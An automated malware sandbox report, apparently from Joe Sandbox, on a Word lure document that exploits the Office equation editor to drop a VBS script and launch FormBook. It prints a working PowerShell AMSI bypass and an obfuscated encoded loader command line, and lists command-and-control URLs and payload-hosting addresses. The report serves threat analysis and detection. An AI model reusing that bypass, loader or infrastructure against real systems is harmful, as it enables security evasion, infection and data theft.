          Source: C:\Windows\SysWOW64\calc.exeThread register set: target process: 1764
          Source: C:\Windows\SysWOW64\cmmon32.exeThread register set: target process: 1764
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*iUtils') {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like '*Context') {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1);$0462662046266204626620462662046266204626620462662=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,48,50,65,53,50,65,
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C cscript %tmp%\Client.vbs A C
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\calc.exe {path}
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\WINDOWS\syswow64\calc.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\cscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 11.2.calc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.0.calc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.0.calc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.calc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.0.calc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.533047014.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.510963723.0000000007F69000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.695505990.0000000000230000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.493675767.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.695460861.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.533315726.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.523205518.0000000007F69000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.695385145.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.493359137.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.533246688.0000000000290000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 11.2.calc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.0.calc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.0.calc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.calc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.0.calc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.533047014.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.510963723.0000000007F69000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.695505990.0000000000230000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.493675767.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.695460861.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.533315726.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.523205518.0000000007F69000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.695385145.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.493359137.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.533246688.0000000000290000.00000040.00020000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsWindows Management Instrumentation11DLL Side-Loading1DLL Side-Loading1Deobfuscate/Decode Files or Information1Credential API Hooking1File and Directory Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScripting1Boot or Logon Initialization ScriptsProcess Injection711Scripting1LSASS MemorySystem Information Discovery114Remote Desktop ProtocolCredential API Hooking1Exfiltration Over BluetoothEncrypted Channel11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsShared Modules1Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information2Security Account ManagerSecurity Software Discovery121SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsExploitation for Client Execution33Logon Script (Mac)Logon Script (Mac)Software Packing1NTDSProcess Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol113SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCommand and Scripting Interpreter111Network Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsVirtualization/Sandbox Evasion31SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonRootkit1Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobModify Registry1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Virtualization/Sandbox Evasion31/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Process Injection711Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 532835 Sample: RFQ-18072 QPHN .doc Startdate: 02/12/2021 Architecture: WINDOWS Score: 100 41 google.com 2->41 51 Document contains OLE streams which likely are hidden ActiveX objects 2->51 53 Found malware configuration 2->53 55 Malicious sample detected (through community Yara rule) 2->55 57 15 other signatures 2->57 10 powershell.exe 4 16 2->10         started        14 WINWORD.EXE 292 21 2->14         started        17 EQNEDT32.EXE 47 2->17         started        signatures3 process4 dnsIp5 49 cdn.discordapp.com 162.159.134.233, 443, 49165 CLOUDFLARENETUS United States 10->49 71 Writes to foreign memory regions 10->71 73 Injects a PE file into a foreign processes 10->73 19 calc.exe 10->19         started        35 C:\Users\user\...\Client.vbs:Zone.Identifier, ASCII 14->35 dropped 37 C:\Users\user\AppData\Local\Temp\Client.vbs, ASCII 14->37 dropped 39 ~WRF{582F6110-BFFF...C-377131C85BB6}.tmp, Composite 14->39 dropped 75 Document exploit detected (creates forbidden files) 14->75 77 Microsoft Office drops suspicious files 14->77 79 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 17->79 22 cmd.exe 17->22         started        file6 signatures7 process8 signatures9 59 Modifies the context of a thread in another process (thread injection) 19->59 61 Maps a DLL or memory area into another process 19->61 63 Sample uses process hollowing technique 19->63 65 2 other signatures 19->65 24 explorer.exe 19->24 injected 28 cscript.exe 22->28         started        process10 dnsIp11 43 eminkoy.com 192.0.78.24, 49167, 80 AUTOMATTICUS United States 24->43 45 www.towne-kitchen.com 24->45 47 www.eminkoy.com 24->47 67 System process connects to network (likely due to code injection or exploit) 24->67 30 cmmon32.exe 24->30         started        69 Creates processes via WMI 28->69 signatures12 process13 signatures14 81 Modifies the context of a thread in another process (thread injection) 30->81 83 Maps a DLL or memory area into another process 30->83 85 Tries to detect virtualization through RDTSC time measurements 30->85 33 cmd.exe 30->33         started        process15

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          RFQ-18072 QPHN .doc16%ReversingLabsDocument-RTF.Trojan.Alien

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{582F6110-BFFF-4A00-AFCC-377131C85BB6}.tmp100%AviraEXP/CVE-2017-11882.Gen

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          11.0.calc.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          11.0.calc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          11.2.calc.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          11.0.calc.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://scas.openformatrg/drawml/2006/main0%Avira URL Cloudsafe
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
          http://schemas.openformatrg/package/2006/r0%URL Reputationsafe
          http://schemas.openformatrg/package/2006/content-t0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.eminkoy.com/t3t2/?YTX8m6=X/AHJ1G8CzET27bRNAkcy2zo056pG+X2bUgtrIM6Usdw2LVzhx3zymRQr/cABPSK+z/Wow==&GZS=5jiXYnvXE60%Avira URL Cloudsafe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          www.getyourshoponline.com/t3t2/0%Avira URL Cloudsafe
          http://schemas.open0%URL Reputationsafe
          http://servername/isapibackend.dll0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          google.com
          172.217.168.14
          truefalse
            high
            cdn.discordapp.com
            162.159.134.233
            truefalse
              high
              eminkoy.com
              192.0.78.24
              truetrue
                unknown
                www.eminkoy.com
                unknown
                unknowntrue
                  unknown
                  www.towne-kitchen.com
                  unknown
                  unknowntrue
                    unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://cdn.discordapp.com/attachments/915347845752705109/915799800740462662/mono.jpgfalse
                      high
                      http://www.eminkoy.com/t3t2/?YTX8m6=X/AHJ1G8CzET27bRNAkcy2zo056pG+X2bUgtrIM6Usdw2LVzhx3zymRQr/cABPSK+z/Wow==&GZS=5jiXYnvXE6true
                      • Avira URL Cloud: safe
                      unknown
                      www.getyourshoponline.com/t3t2/true
                      • Avira URL Cloud: safe
                      low

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 0000000C.00000000.515274931.0000000002CC7000.00000002.00020000.sdmpfalse
                        high
                        http://www.windows.com/pctv.explorer.exe, 0000000C.00000000.506291224.0000000002AE0000.00000002.00020000.sdmpfalse
                          high
                          http://scas.openformatrg/drawml/2006/mainWINWORD.EXE, 00000000.00000002.576587215.000000000785E000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://investor.msn.comexplorer.exe, 0000000C.00000000.506291224.0000000002AE0000.00000002.00020000.sdmpfalse
                            high
                            http://www.msnbc.com/news/ticker.txtexplorer.exe, 0000000C.00000000.506291224.0000000002AE0000.00000002.00020000.sdmpfalse
                              high
                              http://www.icra.org/vocabulary/.explorer.exe, 0000000C.00000000.515274931.0000000002CC7000.00000002.00020000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://schemas.openformatrg/package/2006/rWINWORD.EXE, 00000000.00000002.576606148.000000000788E000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.WINWORD.EXE, 00000000.00000002.571818329.0000000004430000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.576540288.0000000001BE0000.00000002.00020000.sdmpfalse
                                high
                                http://schemas.openformatrg/package/2006/content-tWINWORD.EXE, 00000000.00000002.576557721.000000000782E000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://investor.msn.com/explorer.exe, 0000000C.00000000.506291224.0000000002AE0000.00000002.00020000.sdmpfalse
                                  high
                                  http://www.%s.comPAWINWORD.EXE, 00000000.00000002.571818329.0000000004430000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.576540288.0000000001BE0000.00000002.00020000.sdmpfalse
                                  • URL Reputation: safe
                                  low
                                  http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 0000000C.00000000.515274931.0000000002CC7000.00000002.00020000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.hotmail.com/oeexplorer.exe, 0000000C.00000000.506291224.0000000002AE0000.00000002.00020000.sdmpfalse
                                    high
                                    https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2explorer.exe, 0000000C.00000000.516222538.0000000003D90000.00000004.00000001.sdmpfalse
                                      high
                                      http://schemas.openWINWORD.EXE, 00000000.00000002.576557721.000000000782E000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000002.576606148.000000000788E000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://servername/isapibackend.dllcscript.exe, 00000005.00000002.420189170.0000000001F10000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.517376930.0000000003E50000.00000002.00020000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      low

                                      Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public

                                      IPDomainCountryFlagASNASN NameMalicious
                                      192.0.78.24
                                      eminkoy.comUnited States
                                      2635AUTOMATTICUStrue
                                      162.159.134.233
                                      cdn.discordapp.comUnited States
                                      13335CLOUDFLARENETUSfalse

                                      General Information

                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                      Analysis ID:532835
                                      Start date:02.12.2021
                                      Start time:18:34:56
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 11m 2s
                                      Hypervisor based Inspection enabled:false
                                      Report type:light
                                      Sample file name:RFQ-18072 QPHN .doc
                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                      Number of analysed new started processes analysed:17
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:1
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal100.troj.expl.evad.winDOC@12/12@6/2
                                      EGA Information:Failed
                                      HDC Information:
                                      • Successful, ratio: 28.4% (good quality ratio 27%)
                                      • Quality average: 68.5%
                                      • Quality standard deviation: 29.2%
                                      HCA Information:
                                      • Successful, ratio: 100%
                                      • Number of executed functions: 0
                                      • Number of non-executed functions: 0
                                      Cookbook Comments:
                                      • Adjust boot time
                                      • Enable AMSI
                                      • Found application associated with file extension: .doc
                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                      • Attach to Office via COM
                                      • Scroll down
                                      • Close Viewer
                                      Warnings:
                                      Show All
                                      • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                      • TCP Packets have been reduced to 100
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                      • VT rate limit hit for: /opt/package/joesandbox/database/analysis/532835/sample/RFQ-18072 QPHN .doc

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      18:35:22API Interceptor36x Sleep call for process: EQNEDT32.EXE modified
                                      18:35:24API Interceptor13x Sleep call for process: cscript.exe modified
                                      18:35:26API Interceptor335x Sleep call for process: powershell.exe modified
                                      18:36:00API Interceptor35x Sleep call for process: calc.exe modified
                                      18:36:18API Interceptor225x Sleep call for process: cmmon32.exe modified
                                      18:37:05API Interceptor1x Sleep call for process: explorer.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      192.0.78.24mtW2HRnhqB.exeGet hashmaliciousBrowse
                                      • www.kgv-lachswehr.com/ea0r/?fHhDa=c9rlrwb5I0PsvCqZfPZLJ32YxU7lPLK2cV3voPHeBiJjRGf36/O5Za+oFiQ/bs3zoxiOdKVauQ==&2d=SFNDF0m
                                      hNfqWik7qw.exeGet hashmaliciousBrowse
                                      • www.amandaznaprawa.com/rht9/?NTiPcP=i488q&2d=oSEpyrDN2jpFtLPZR+/YFKSBf/v8Miz39LE5/YRv+zM0Krg9SxOGQM2eCbJi8hWE+L+z
                                      BL_CI_PL.exeGet hashmaliciousBrowse
                                      • www.talkingpoint.tours/n8ds/?lZOD=wE3cJZPNojFXEHzVtPzLvjQgQ8siWlvoMBTDgMX5y9SxEB5bNYsjP9rL8bMOP+2FRUIW&E0Dpk=l8hHaF
                                      Dumak Order.xlsxGet hashmaliciousBrowse
                                      • www.cletechsolutions.com/yrcy/?n2M4s4o=6oj+cRAcOTuW+xdHLRHF0KzLhmFT0afQnvz1X6yVwGfVu9zh+SVYbIJ6SqTa14IOVkDkCg==&zbO=wpf8lJJX
                                      AWB_SHIPPING DOCS.exeGet hashmaliciousBrowse
                                      • www.talkingpoint.tours/n8ds/?9rJT=wE3cJZPNojFXEHzVtPzLvjQgQ8siWlvoMBTDgMX5y9SxEB5bNYsjP9rL8bMOP+2FRUIW&v4VDH=WHU8k4m
                                      DuxgwH47QB.exeGet hashmaliciousBrowse
                                      • www.magaliverdonck.com/cfn8/?7ntP2=G2JlCZwhJ8t&wZEhNtn=EAmfM1bZJ66AiKX05l3TaYUgrsfuP/gkLWzderYzqwcOOYaogkVBhIhYz1vuz5d9mKCz
                                      ORDER.docGet hashmaliciousBrowse
                                      • www.magaliverdonck.com/cfn8/?r0Dpfv=PV84qbppmxMhmF&etxxAzu=EAmfM1bcJ96Eiab47l3TaYUgrsfuP/gkLWrNCoEyuQcPOp2un0EN3MZawTjo4IJ2zs2EYw==
                                      Ordre de virement.exeGet hashmaliciousBrowse
                                      • www.sammaymotivation.com/wrcb/?i6=JRZY7R8EpGxMvUxoU9FjXImHM9r6be3CVb1cEdmzJ1+o3zoDrIbVKOVdp4L7IUQXVHQZ&Vn=5joLnT60H6UtI
                                      ja71FJcG4X.exeGet hashmaliciousBrowse
                                      • www.fourjmedia.com/w8n5/?6lPx=Krsevr0fcKdFVj2db+BCLUY6buAyCdOHDU7bdlcHSmOR3oywPLLv+weEBRgOZ5y0K3R+&i2=bZ-LgDohxn7
                                      31hGtwI4CD.exeGet hashmaliciousBrowse
                                      • www.givepy.info/s18y/?SF=697MTAEVXvVEXUyAJF20F132oezl1lQlpw2PkmQS81lH+yWLjKrG7SsVWH+sEO7fSxwKD9xmsQ==&7nT=4hfP1hIXyPvt5d80
                                      rfq.exeGet hashmaliciousBrowse
                                      • www.faithtruthresolve.com/unzn/?m8a=YX6yD3qjkEh06A43Kvlzsqa1IJGgtNpO3VOCMHkgx/DYA63i6lhcxQdv+JiPSxcNqo3A&-Z=B0G8W4pHG
                                      sample02.exeGet hashmaliciousBrowse
                                      • www.practicalmalwareanalysis.com/cc.htm
                                      6aA9bRxfnl.exeGet hashmaliciousBrowse
                                      • www.cletechsolutions.com/yrcy/?1bxX=6oj+cRAZOUuS+hRLJRHF0KzLhmFT0afQnvrlL5uU0mfUuMfn5CEUNMx4RP/MxoM9eneU&5j=8pqxuZ4Prl2
                                      Remittance_advice.exeGet hashmaliciousBrowse
                                      • www.baroquefolke.com/snr6/?mTZDVrwX=cbil4dbQ85/EoogyOScyzPrFGpGYEkh7zEyo7+xlFpBsIXqPkX0ip4hj/fSsceuRUxVF&Ip=5jUHiDu8uBc
                                      AWB [EXTERNAL] RFQ-RVS QUOTATION .docGet hashmaliciousBrowse
                                      • www.fourjmedia.com/w8n5/?c45dyZs=Krsevr0acNdBVz6RZ+BCLUY6buAyCdOHDUjLBmAGWGOQ3Ze2Ibajo0mGC0MYdp2HB0MOmQ==&c8itZ=wRJxjZzxmlSHP2Hp
                                      ELEGANT MARINE.exeGet hashmaliciousBrowse
                                      • www.fourjmedia.com/w8n5/?o2JdMD=Krsevr0fcKdFVj2db+BCLUY6buAyCdOHDU7bdlcHSmOR3oywPLLv+weEBRgkGJC0O1Z+&q2JL=nZKHsDQPhRVD1D
                                      URGENT RFQ.docGet hashmaliciousBrowse
                                      • www.givepy.info/s18y/?2dGT=697MTAEQXoVAXE+MLF20F132oezl1lQlpwuf4lMT4VlG+D6Nka6KtWUXVh+qcvjXeHEraA==&aL0lqZ=h0G02VRHXrsHxf
                                      Ekol_LOG_00914,pdf.exeGet hashmaliciousBrowse
                                      • www.flatironstreeservice.com/dgt9/?bH=DN9ti628iJ60&j4=9BOhy8kblAyJide7ynQBLE+qFSLeuxc/qvallqSEtgcGhdWxOk07eomuMpMdU/GfV2RowavF0Q==
                                      v54ueAmr6D.exeGet hashmaliciousBrowse
                                      • www.mainponsel.com/n8cr/?nL0DH=mVFDnNjLroOTVY/e2vMB3+FXNX8eexEZxlQPv7nMWghAxegu28tS6Ss7v6+WYIySqVct&c48dyT=rPYXgR
                                      payment advice0272110.exeGet hashmaliciousBrowse
                                      • www.balancewithaleah.com/anab/?CrQPabN=Xq26k3Jj0XA4JzGQXcUfFdoPxof5hYfqOOgiZk0LVeacRlwLQboGWdO/+6GaPmhxDehR&_fQL6d=_Tb0RzfHQPihG

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      cdn.discordapp.comRFQ-CIF DT22.docGet hashmaliciousBrowse
                                      • 162.159.135.233
                                      RFQ00_3779028392.docGet hashmaliciousBrowse
                                      • 162.159.134.233
                                      uATT8vAUK9.exeGet hashmaliciousBrowse
                                      • 162.159.135.233
                                      1Y0xc70fbX.exeGet hashmaliciousBrowse
                                      • 162.159.129.233
                                      Document.exeGet hashmaliciousBrowse
                                      • 162.159.129.233
                                      new offers885111832.docxGet hashmaliciousBrowse
                                      • 162.159.129.233
                                      new offers885111832.docxGet hashmaliciousBrowse
                                      • 162.159.134.233
                                      lifehacks_6582318243.docxGet hashmaliciousBrowse
                                      • 162.159.134.233
                                      lifehacks_6582318243.docxGet hashmaliciousBrowse
                                      • 162.159.130.233
                                      Narudzba.0953635637.PDF.exeGet hashmaliciousBrowse
                                      • 162.159.129.233
                                      Orden de compra.exeGet hashmaliciousBrowse
                                      • 162.159.133.233
                                      NOTIFICACION DE CITACION No. 0988-02043-2020. OFICINA DE TALENTO HUMANO.exeGet hashmaliciousBrowse
                                      • 162.159.133.233
                                      WK1CQtJu13.exeGet hashmaliciousBrowse
                                      • 162.159.135.233
                                      SecuriteInfo.com.Packed-GDV0304D0F07C5D.24466.exeGet hashmaliciousBrowse
                                      • 162.159.130.233
                                      SecuriteInfo.com.W32.AIDetect.malware1.19028.exeGet hashmaliciousBrowse
                                      • 162.159.129.233
